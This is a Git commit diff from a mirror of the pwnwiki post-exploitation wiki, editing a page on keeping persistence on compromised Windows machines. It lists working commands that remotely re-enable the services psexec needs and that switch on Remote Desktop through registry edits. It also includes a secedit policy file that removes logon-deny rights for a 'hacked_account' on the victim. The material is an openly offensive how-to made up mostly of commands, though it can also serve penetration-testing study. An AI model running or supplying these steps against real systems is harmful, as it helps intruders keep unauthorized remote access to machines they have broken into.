weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

Finished adding some content to the remote desktop and psexec sections

Browse Source
This commit is contained in:
webbreacher
2013-12-29 07:12:43 -05:00
parent 7ec6e3ae60
commit 44dd8b08ff
1 changed files with 27 additions and 18 deletions
Download Patch File Download Diff File Expand all files Collapse all files

45
persistence/windows/general.md
View File

@@ -15,23 +15,23 @@ Commands to run to maintain persistence after you have exploited it and are usua
### Enable `psexec`
* The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
`` c:\> net use \\target\ipc$ username /user:password
c:\> sc \\target config netdde start= auto
c:\> sc \\target config netddedsdm start= auto
c:\> sc \\target config clipsrv start= auto
c:\> sc \\target start netdde
c:\> sc \\target start netddedsdm
c:\> sc \\target start clipsrv
``
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
``c:\> net use \\target\ipc$ username /user:password
c:\> sc \\target config netdde start= auto
c:\> sc \\target config netddedsdm start= auto
c:\> sc \\target config clipsrv start= auto
c:\> sc \\target start netdde
c:\> sc \\target start netddedsdm
c:\> sc \\target start clipsrv
``
### Enable Remote Desktop
* Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
1. Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
<pre>
<pre>
[Unicode]
Unicode=yes
[Version]
@@ -43,16 +43,25 @@ Commands to run to maintain persistence after you have exploited it and are usua
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
</pre>
</pre>
1. Create another file named `enable_ts.reg` containing the contents below.
1. Create another file named `enable_ts.reg` containing the contents below.
<pre>
<pre>
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
</pre>
</pre>
1.
1. On the remote system, execute the following commands:
``c:\> sc config termservice start= auto sc config termservice start= auto
c:\> regedit /s enable_ts.reg
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
c:\> gpupdate /Force
c:\> net start "terminal services"
``